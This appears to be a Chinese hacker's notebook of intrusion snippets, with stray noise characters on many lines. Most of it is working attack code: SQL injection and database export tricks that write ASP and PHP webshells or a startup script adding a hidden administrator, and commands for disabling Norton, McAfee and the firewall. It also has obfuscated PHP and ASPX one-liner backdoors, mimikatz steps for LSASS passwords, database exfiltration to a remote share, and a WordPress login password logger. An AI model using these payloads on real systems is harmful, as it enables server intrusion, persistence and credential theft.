* O2 l' v0 ~& z; Y  c6 Q6 M. [SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' f% l) _6 t3 J" D( I9 F; Faccess中导出shell1 a$ h* E  H$ R5 w" W! D0 `% d& P
# ^+ J6 A) Q5 V' P, R/ `+ q! U
中文版本操作系统中针对mysql添加用户完整代码:0 Z- X- ?/ d# R' v5 O
$ u6 F1 o& D5 N, `1 ?7 j" }
use test;6 t: s0 Q9 H$ ^. z2 u
create table a (cmd text);5 N: S- P% A4 D8 O7 R6 ?! h. r& `
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
, p' W+ f4 g0 [% Xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );" Z" R8 @3 X" |7 m7 `2 c
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );, Q9 d0 Y7 I4 s  s) \
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";: e7 \' X2 W) U' d
drop table a;2 f. C5 `: W& |+ R( g
3 `; ~, |3 ^- T
英文版本:- U& P1 t5 g; Q$ z5 B) q$ b

( l! U6 `7 c8 f  Cuse test;: n# B) V; U  h7 y8 E( M- d  s: g
create table a (cmd text);
. T: d4 d# z: j) H, ~) e0 g( F, I. \) Ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );
1 P6 h$ Z: b9 ^' r0 {insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; w8 B0 l6 R0 [* Rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
) G: ]( t$ D* [, P% s4 s& k+ }0 [+ uselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";0 D8 F( h6 B& @; |
drop table a;1 H* T+ k& H* j3 p

! o( W1 q3 |1 @create table a (cmd BLOB);% w# e: N/ O0 ]* f
insert into a values (CONVERT(木马的16进制代码,CHAR));
& L2 [1 F$ P# K/ p9 wselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'! W2 R1 I, g# {* t
drop table a;
" e3 E1 R8 J6 x: z3 j7 h. \$ h7 A2 g: ~
记录一下怎么处理变态诺顿8 G9 b! S% i1 R5 ~# }
查看诺顿服务的路径' q3 M5 N: l+ c  @
sc qc ccSetMgr
5 W- m  K' g4 W然后设置权限拒绝访问。做绝一点。。
2 L8 i2 m" f2 Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
, q0 W- q  H0 Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
# o, p$ ?& k. ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
" F8 `: Y% y. c9 Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone# E& M* \0 \) ]1 y. k) w( `

1 M0 n; r. V2 a然后再重启服务器
$ Z3 H$ W7 ?+ w6 H1 c3 Wiisreset /reboot& V7 O% k; U" o
这样就搞定了。。不过完事后。记得恢复权限。。。。- [& O- U$ R. A/ D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F( g. |) M  m* H+ M& p
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
) o0 t- u* P) ]- ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F1 c) U, f7 u: r7 ?# N7 Q( `% Z7 K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
# a+ T4 S1 L' U: NSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
- Y5 Y0 E+ Q0 E$ U" h+ I' N$ K! E$ J9 E# E$ {; t: {! t7 W
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
3 ?5 M. R0 ^# X, K
8 I' _+ U1 B* m5 Spostgresql注射的一些东西
! X/ E& \1 J$ v. Q如何获得webshell
+ w4 t+ g5 z/ J8 |! S# xhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
* |- h; e" @& }9 @3 [7 }http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 T) G" R! [4 G/ a2 c: Ihttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;0 \% d3 U- t) K/ S1 g
如何读文件
( F, h! b) F0 ]" ^0 ^1 phttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);# A4 l8 a. o2 Y1 g. P( m
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
  r# I6 W  A5 d  u; o3 l1 l+ |http://127.0.0.1/postgresql.php?id=1;select * from myfile;
8 q1 u) V# a, D1 x; \! V5 F) G5 L6 u$ C4 \
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。  C  }. {8 \# ~
当然,这些的postgresql的数据库版本必须大于8.X
8 I$ y  g5 i3 Q创建一个system的函数:0 Q$ H$ y2 u' r% {" |) h& w3 B( R+ P
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
: L  O( W0 V; h/ j
- w, |. I+ b7 O2 }( B创建一个输出表:
" H1 {* j5 ~5 k4 d) z+ N1 bCREATE TABLE stdout(id serial, system_out text)
, x& P( T& R3 ]7 }% r
0 D% R0 k; m  C! Y/ f执行shell,输出到输出表内:
7 w+ S3 S# y- BSELECT system('uname -a > /tmp/test'); M7 N1 z7 N4 \
6 D3 v- k8 S9 V! k9 w5 P3 I
copy 输出的内容到表里面;
* j5 x0 Y& L8 V4 Z2 VCOPY stdout(system_out) FROM '/tmp/test'
8 }: r& }8 ~. b) W( P" m2 v- {$ e: Y+ `* \* F
从输出表内读取执行后的回显,判断是否执行成功; H' \$ E; f4 Z: Z8 L
1 @9 f2 E  s4 D9 L9 f# {7 T' x
SELECT system_out FROM stdout
+ w8 p8 \* `$ a: \下面是测试例子/ H. E& H6 c( l+ N  D

+ b1 k' q$ |! }2 t. _$ I/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. S4 t8 @9 S# @) C6 p$ T( L; j( R+ ^9 I) B  G. a( O4 n
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
- X# i2 D0 U# K9 JSTRICT --$ e: I: C5 u+ H; k- Q9 [
# I  ?9 D" Z2 y; I
/store.php?id=1; SELECT system('uname -a > /tmp/test') --) a' A0 S* J; ]8 g' U

4 E$ o0 s0 D+ V3 W* R% R4 K& [/ f- C/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --3 G7 ]* z, N8 F$ b/ `/ s# I

; d3 Q* k: s! Y8 ~: d: K2 C/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
6 C5 v& _+ _( snet stop sharedaccess    stop the default firewall
: h# }' Y' ^, T. v( W  B2 W7 v) `netsh firewall show      show/config default firewall
! H& u4 Y: K5 r% d9 knetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall9 u% U7 }& t5 |  D9 ^
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall% O5 X' Q. ?' Y+ X; W$ F, b
修改3389端口方法(修改后不易被扫出)6 h7 ~* z/ p; _+ M
修改服务器端的端口设置,注册表有2个地方需要修改7 E3 |" ]+ J; l( W6 r

7 T+ `. n0 M5 e# r. A# Z5 h% _- S[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 i9 K4 ]* z& p# J& ^. r' f$ J2 fPortNumber值,默认是3389,修改成所希望的端口,比如60008 j- j) ^  v# w; F6 }! a
5 h  o3 \" P3 l( Z9 L, d! z
第二个地方:% Q/ ?# |' q( T: U" V* O& B) I
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
: l5 i# e; I; N  t7 ZPortNumber值,默认是3389,修改成所希望的端口,比如6000& @/ U# D/ ]; L+ W$ U
, V" t; j& v3 h- f
现在这样就可以了。重启系统就可以了  O9 ?+ ?7 E; Q, U
! e( O# }. c8 U! K
查看3389远程登录的脚本
! h' W4 [3 F7 ]3 w7 E5 @7 Z( B保存为一个bat文件. I% E5 |5 }8 k' E6 u: I1 i; H
date /t >>D:\sec\TSlog\ts.log
" ~. ]+ ]1 q' J' O' f% y" V( ptime /t >>D:\sec\TSlog\ts.log
& u1 s' Q. H% q- f+ c  Hnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log: \# [' c6 {6 |+ R  w
start Explorer2 q3 {' `0 m% S

: V/ l% l0 P; M7 `- K) E/ Ymstsc的参数:
' J0 ?  K8 U5 d& t3 U' F4 D1 t, i+ {2 q$ j  @
远程桌面连接
; Q$ H6 C& U) I# @. d0 j3 W: G: o- O0 V: f* y0 W
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]$ R- M! v! O& W; @4 ^
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
$ J1 p0 S% F$ F" Y# _+ ], {, v" f+ `) y. U4 c/ l8 R2 c
<Connection File> -- 指定连接的 .rdp 文件的名称。3 m3 k% d% c: v" G/ O+ _) E! [
9 Q% ^6 j$ P& ?) G5 p; _
/v:<server[:port]> -- 指定要连接到的终端服务器。
5 m: \! v* t" m
/ b& b7 \0 ^+ [+ K9 o- @/console -- 连接到服务器的控制台会话。
) S$ f* P  `5 N6 H3 U2 [* l1 V
. J6 v- z0 m% f  i0 ^$ U* l' N/f -- 以全屏模式启动客户端。
/ d0 F6 p4 X8 T( ^; w
* o+ A- o8 z: d/w:<width> --  指定远程桌面屏幕的宽度。- B) b1 R! X" D

& O8 {7 u; ]0 M0 W1 h; Z) r/h:<height> -- 指定远程桌面屏幕的高度。% g* w% l1 j' p+ W. @5 d4 f- l6 ]

, d/ {# y! m( H! }/edit -- 打开指定的 .rdp 文件来编辑。- S( Q8 |! a  }* Z. h7 v/ M$ T
4 U% R# l! _9 B3 P8 M7 a
/migrate -- 将客户端连接管理器创建的旧版
/ @8 k! a/ k) {" u连接文件迁移到新的 .rdp 连接文件。
5 z7 \. _, ^2 J# r, b
# M3 X1 ?) _& V- Z
% u$ ]( o& }4 S; Q其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就2 \) \1 z) k$ _
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
1 ^% R2 p: r2 K& x4 l  n" b+ R& r5 B' ^! c$ X1 S
命令行下开启3389
. r5 D0 T. O3 E9 Z, vnet user asp.net aspnet /add
9 n9 O! i. K3 J; _* L3 i! J) tnet localgroup Administrators asp.net /add( a- a% k# Y% a; y& ^
net localgroup "Remote Desktop Users" asp.net /add
9 C) ^6 I; k9 R* B  _3 qattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
, @6 A9 X. u  `4 N% B; K, h4 ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
4 h9 D* G! m5 k! y# Secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
8 O" |2 G" R- y' r  wecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
, Y- i4 Q/ N" r! n2 ^7 L- `( D) x0 gsc config rasman start= auto
) V0 F: z( L) i" _1 @# {1 esc config remoteaccess start= auto. m2 x1 O) z+ I' J) U$ m
net start rasman9 T/ _0 B5 I' _! }
net start remoteaccess
$ v! D$ D$ d+ D. k* @0 ?/ `0 H# ?Media
2 |' R8 r( X1 R9 H! E' ?<form id="frmUpload" enctype="multipart/form-data"/ S- b7 x5 y5 ~5 r
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>" V- e, Y& d2 _7 h; f- f$ c
<input type="file" name="NewFile" size="50"><br>9 Z- L8 E  e: `$ u& s( H9 e' Z
<input id="btnUpload" type="submit" value="Upload">& @' J) R$ q3 d, }8 n
</form>
4 d9 k# m3 z9 g/ o
  H6 R0 J/ E' ~  M- p9 Mcontrol userpasswords2 查看用户的密码3 j6 k9 Q% D3 X5 X5 `
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
! U& s7 B/ \5 sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 X- ]- B5 P! U6 Z- S3 _4 M
) ]3 E1 h0 O' x* J
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
/ n' m# Q& G: w6 n测试1:6 t. K* V. _; V; B% l/ ~. t
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
' C" J; C3 i% \7 }7 S- O! u  _1 B+ b  b1 x1 Y
测试2:
% A4 G' }! d7 H! j: t2 ~& t
: _& O: Z2 H& @1 Screate table dirs(paths varchar(100),paths1 varchar(100), id int)# p  R- @9 P) D# n5 _" ^
; X+ ?* X) a' F1 e1 y3 [% a5 U# w
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 A! O2 k! t  B% s7 h0 b* H! D  W# z
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; E  B7 R% i! j& B) G关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
. t: b3 G. K  R0 F2 p5 I可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;* o" ]- E4 r+ G! ]3 |& W
net stop mcafeeframework
& R9 A6 z5 A7 t: U7 g+ ^net stop mcshield7 r" a# g, A8 U
net stop mcafeeengineservice
) o0 A( ~+ \7 F" Enet stop mctaskmanager
& Q% x0 @9 D+ ~$ O8 H8 Fhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
6 z  t2 {  U+ ?0 g0 C
* O* {9 c1 d1 W8 {  VNCDump.zip (4.76 KB, 下载次数: 1)
0 O2 t1 {- }1 J; J/ V% t密码在线破解http://tools88.com/safe/vnc.php
) T4 g( {/ f# E: b; V$ a- nVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取: m# e1 L0 A/ L  {2 R+ Q) k7 c
1 L3 S0 H+ M8 h" c, x6 s$ P, C
exec master..xp_cmdshell 'net user'6 ^) m: i0 {. B3 O
mssql执行命令。
7 ?. Y" p( l3 n8 ~4 H- {* n获取mssql的密码hash查询; C9 }5 i- X  |  h, C& i; ?
select name,password from master.dbo.sysxlogins
( Y/ X& r: G  l' e! Z, w/ j
% d5 J4 T: p5 F' Q6 m5 B1 Vbackup log dbName with NO_LOG;
( I' p* G9 ?9 z% k) W/ a6 cbackup log dbName with TRUNCATE_ONLY;$ j# a2 h4 \) x/ R2 N  F3 H$ `* p
DBCC SHRINKDATABASE(dbName);0 _. q0 p8 g! A& J  x# d% A4 A& l
mssql数据库压缩
$ O. W3 @& k$ h6 Y/ b# m5 V( K, m+ k
$ c7 a2 d# c! X4 N1 q0 ^* |Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
9 K) |6 |+ Q1 D2 F- O3 e' w7 m将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
+ u8 v# {' A8 j" }
0 }( _! |8 z) F% P4 D: X9 K8 Xbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak') @; \6 n( q6 g4 [; c
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak) ~3 H' L8 f- `. }0 h

8 o1 C! w( {7 t$ i6 [4 h4 I8 ]Discuz!nt35渗透要点:% Z9 a. e' D* V& T/ _2 \9 S1 I
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
% E; x: ?0 F# E# ?" ]$ Q2 X. z(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, j9 _+ C6 f8 l+ K1 C, J5 p(3)保存。3 }( {- S0 P; u& a1 ?, o
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
! [) z6 N, _1 K( ^3 fd:\rar.exe a -r d:\1.rar d:\website\! v' [( J. w" Y
递归压缩website
2 V6 @! `' u! a+ K: u1 E注意rar.exe的路径6 R% R/ S( V4 ~

0 D+ h% Q- z8 b$ L( c<?php/ u- _& X+ t/ h! V2 Z6 I$ m2 ?

; H, F2 L, j- E; j( H$telok   = "0${@eval($_POST[xxoo])}";, c* O/ F& }. J7 x+ v( \. D

( ?' H* P7 [% P% a  i$username   = "123456";
, ~" |% B) X# r  }% Z$ c' q% H2 m! {7 Y! ^7 B- \+ G9 a
$userpwd   = "123456";
& N+ w: T  ]- C
. d/ |, y- |2 x5 J( X: e$telhao   = "123456";
  U' Z; F1 `) V7 Q* B& d
* i$ R+ R# A/ n/ D5 H$telinfo   = "123456";
" k1 \/ m6 O" O0 H) F5 u
, p) b$ M2 \, a! k; e0 M- o. W?>6 q$ ~4 v% c! C3 ]* X1 X/ N$ Q% z
php一句话未过滤插入一句话木马& x0 O8 u% a" ?2 K# J

/ \6 m  Q9 n! u$ ]9 M站库分离脱裤技巧
, [/ w0 H# ?' \, jexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'4 M/ E( Z6 B0 t+ `3 f
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
7 h0 D+ {# r* A, z2 V条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。6 l5 z- M& Y; G7 w4 n7 E! X- G
这儿利用的是马儿的专家模式(自己写代码)。5 _3 R7 f9 ~3 t- c2 v
ini_set('display_errors', 1);
0 e, |* Y: C3 \# X5 B& v( }  cset_time_limit(0);3 P! q: z  W( k5 G  h
error_reporting(E_ALL);( w2 A% u( K# R% x% b9 @
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
, X. s" _7 u# \" y- T# wmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());+ G  X2 n. z9 q3 T
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());5 q$ S9 s. c" ^- u
$i = 0;
% L4 p( q4 v$ `. ?$tmp = '';' K  m+ @3 Q8 K$ h% S0 D  [
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {; [+ z: N7 _! {7 v
    $i = $i+1;
# c  |) ?+ y/ L2 Y    $tmp .=  implode("::", $row)."\n";
( v. \* w8 U! x7 }4 B    if(!($i%500)){//500条写入一个文件- N  W) L" [- l$ C" Y
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
; z$ V4 \' `9 U$ A+ K3 q$ q        file_put_contents($filename,$tmp);; b2 k! @3 P% T& D4 j  ~9 L
        $tmp = '';
- o# B( F) D  r% m0 ]4 M! U    }  ^2 @- c& c) ^3 \
}
, N3 k6 B4 l% b& r$ P4 f9 m3 vmysql_free_result($result);3 Q* t: P; G- C2 [9 p% Q: e) Z$ ^

, O& I+ o5 w! D5 U
$ u6 k9 c1 K% s9 N' l
) ^: |+ Y, g' G: x! y//down完后delete3 [$ A2 L% K! w; q& M0 {
( p' d/ _0 D2 O+ q( v

0 n) V& v' t3 i; q( nini_set('display_errors', 1);
/ Y6 D4 b7 a' |. U8 gerror_reporting(E_ALL);
) q3 B% p# v+ G' a0 O& s$ F$i = 0;
  y6 `- `2 a) x9 x& F, iwhile($i<32) {3 q' |+ u* B* [2 i
    $i = $i+1;
- O# Z1 \& D& v9 ~/ g        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';3 w2 C; Z2 L/ b! X7 J2 z+ f* w0 T
        unlink($filename);% a7 s+ g/ I6 h! a& B* J. F2 [* e
}
" }5 f+ [* S* \* ]0 Shttprint 收集操作系统指纹: {& k4 p' ?' z  C
扫描192.168.1.100的所有端口$ A, L/ {# @3 I) B+ a7 G! Q: O
nmap –PN –sT –sV –p0-65535 192.168.1.100" |! Q4 b# i8 a2 |1 f
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
0 {/ O7 U; ?9 ~8 Ghost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输( v- r1 e' n' v8 K; r
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host+ P- y3 i$ p( e

8 T, m# h8 l2 n2 B! H9 YDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册). K7 x+ W9 s9 S( \* ~
$ |7 m" D; ]6 A# \
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
: z8 d9 S$ l+ j! z, b4 q% `
- t/ L5 q2 a! h& d  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* k! z; k, S0 L- i- q7 k: H  T. w# ~# |# u: {
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)' J2 H4 N' D- ^: Z; f# o  |7 L

8 e$ ~8 @0 y2 f  http://net-square.com/msnpawn/index.shtml (要求安装)4 w! b1 k% C( f2 ]# s

& H4 f6 Z3 M0 d# f  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)6 y9 Y5 w( ?! z; d+ p
( _0 z! w0 P3 n9 e
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)+ A4 c; A5 \7 E3 E4 |! n" T
set names gb2312
3 x# v2 ^4 A1 ^导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
% f0 z& V% O$ @7 D- G6 s( w. \8 u- t2 o5 d
mysql 密码修改0 M5 ~* \5 r! X
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
" Q& ~& S9 b( T6 I: T# [update user set password=PASSWORD('antian365.com') where user='root';1 b! Y/ l% m# n) Q( [5 l
flush privileges;
* ~' L4 v9 ]9 [4 |1 F2 o7 i高级的PHP一句话木马后门; V. F0 U, f9 ]: ^/ \# I1 d
& }  ?" O; C) h! }! s) c) `
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
; B" l  J5 C3 n( M- s% z9 ]- N5 g& n8 _8 x( U) R
1、: Y/ J- e  M: Y) P

+ ]! p$ B4 l( {$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; d6 _  u( x  O4 y) G  a- x3 `( z4 i1 V& ?6 s/ d, {% ?! Y$ S
$hh("/[discuz]/e",$_POST['h'],"Access");
" V& y4 l( T. |5 d' \
6 q7 Y' G/ k! m1 P0 {2 G//菜刀一句话
7 F; V  e; w" G2 Z, b4 K1 G% u
  ?) }* k) e4 l8 `0 v, g) E/ T' i2、
) a, D  E7 F( C/ Z1 }
, }, ]! G# ?* F, |- P6 ?& }$filename=$_GET['xbid'];& N* r7 J/ j0 O/ @: `: O4 a

' |( w6 X, {& p8 m/ ainclude ($filename);
4 ]. F6 g5 j- b! w$ c5 {* f( y- v0 ~: U( T# x
//危险的include函数,直接编译任何文件为php格式运行) q; ]* P, X: A7 j9 G6 e, [1 m* M
) o6 d" I. V3 X3 e- m9 z
3、
' [7 @& J1 o7 `( C! P- a+ a0 ?+ S0 q; r) W6 s# g' H* q% k
$reg="c"."o"."p"."y";
* G! J3 w$ [2 G/ f' r: V  J/ j: E4 C$ \, }0 \2 }! `7 r' m
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
* U# ^: `2 _) F
7 a6 Y9 Z! I3 Q//重命名任何文件
5 C+ a0 h9 l% P
2 x' F6 V$ T4 |1 t  h& q+ e4、
1 n& ^0 n) j3 B: @+ Q$ V3 m9 \4 F' V
- _& F- ]) Q. n, `' D* _3 J' {5 q$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
) c( n% P3 R! Y/ c6 A6 ]6 l6 P' B( s0 ?5 Y* x# s" U
$gzid("/[discuz]/e",$_POST['h'],"Access");* o; z7 C1 R; p0 d: e5 U

  A- A; W* X$ z. }( [6 Q$ ^//菜刀一句话" ~/ ]% Z+ ?; Z- T. q$ M0 c6 _+ q
7 W% i3 j* M- C4 W; ~) }, \) q; V
5、include ($uid);6 u* h$ {; W  G) _7 l2 B

+ |5 p( T! m! r0 a: B  `8 Y( z//危险的include函数,直接编译任何文件为php格式运行,POST
- d7 ?, Z4 w5 s1 R$ E, [( p" e; E+ w6 ?: M

2 |# B' L6 ~6 h//gif插一句话: a4 g5 \5 c) {2 v0 h

, D. @$ n( Y2 P- F; d6 s5 H6、典型一句话
$ M: A6 i3 M3 P. L; X4 A3 ^
: J  ~# G+ L3 v6 L- o4 E. y* c程序后门代码$ s! I: `& J: V- b
<?php eval_r($_POST[sb])?># j# Z) P# M0 t+ k- o6 @
程序代码
( ?- t/ g0 L. |5 B+ D4 D. u<?php @eval_r($_POST[sb])?>
; f. ?3 h5 q. D9 D//容错代码
4 L, }4 f( a, M% S% ^7 L程序代码( y, u/ [( G& F+ A! C, n
<?php assert($_POST[sb]);?>
* f, E1 p# |& b0 z//使用lanker一句话客户端的专家模式执行相关的php语句
/ K$ p& T( ?3 Q1 |1 V) u程序代码7 o/ W4 ?6 f# D, H7 l' ?
<?$_POST['sa']($_POST['sb']);?>
( z& ~4 ^2 O& D' G; M! ^, D程序代码! m9 U, W0 F3 e1 v7 `4 U3 W
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
8 ~  J- [7 d8 g/ m1 M; y2 @5 U程序代码3 ]5 G; u; o2 V. g2 h4 x) X
<?php. I4 s- l* y5 W# r" I' n: n- K. y
@preg_replace("/[email]/e",$_POST['h'],"error");
) t* x4 z+ t: n2 M" I) ~: O?>
3 P: E/ t" E! X//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入7 n* D8 o; T* q6 n/ a5 ~7 a* u
程序代码
" ^: r8 d7 {, b$ }4 z( W7 [<O>h=@eval_r($_POST[c]);</O>
7 H& N; ^" ?+ `7 m+ H程序代码
! e5 Z& ^. v; Y  s- u! ?<script language="php">@eval_r($_POST[sb])</script>
9 }; n# |' F4 N/ h//绕过<?限制的一句话
/ B; L" x1 [9 k1 E/ w  ~  R* ~$ |( }$ P# V8 `! {# T) t8 h
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip8 y; {. k; s$ \! c( d1 s5 T" M
详细用法:  w: b) C- g/ z9 Q
1、到tools目录。psexec \\127.0.0.1 cmd
2 H; E: V) u3 J; X2、执行mimikatz
& \9 G" O" k( A3、执行 privilege::debug
: w( O& E& E. }, F( ]4、执行 inject::process lsass.exe sekurlsa.dll
. ]% P. T, Y3 j5、执行@getLogonPasswords  C/ w, |# `, F8 B: @! m( [1 ~
6、widget就是密码# x# m1 \- }& v  x, v2 i0 T$ L
7、exit退出,不要直接关闭否则系统会崩溃。3 N) Z% F; z2 s& t) r( a$ ?

( E: ^# `: I2 k' l" G8 Fhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面  H' A. g7 t6 ^9 M1 X4 w3 k4 g

, g: u9 w1 A7 v' W! S自动查找系统高危补丁* Z  r; M1 H2 j3 ?7 z, G
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: v' x+ d4 O% m: H- L. i. Q
/ f$ z3 Z/ m8 E4 ?" L, x9 _$ U: e突破安全狗的一句话aspx后门
5 B  G- t! w) f4 D1 O5 c<%@ Page Language="C#" ValidateRequest="false" %>* |$ L' X% g1 K6 u9 Z
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>9 f7 f# X. @- G- N# s$ V: @: ?' v- f
webshell下记录WordPress登陆密码
! T5 ^9 h: N# F* L) dwebshell下记录Wordpress登陆密码方便进一步社工( e% y  B1 ^1 r6 M& o+ [4 s& g
在文件wp-login.php中539行处添加:! f$ t' ]; `- A  n  ]" G
// log password7 T) W, _9 v) M: p+ _
$log_user=$_POST['log'];" p. |7 @3 l( ]1 C
$log_pwd=$_POST['pwd'];9 W) p. e! G5 J+ m
$log_ip=$_SERVER["REMOTE_ADDR"];
1 D) P3 B4 ^- g$ j" ~$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
5 l) V1 B1 D8 ]( e( c' @6 ^/ D$txt=$txt.”\r\n”;7 Z) B2 N& c+ O# u; r
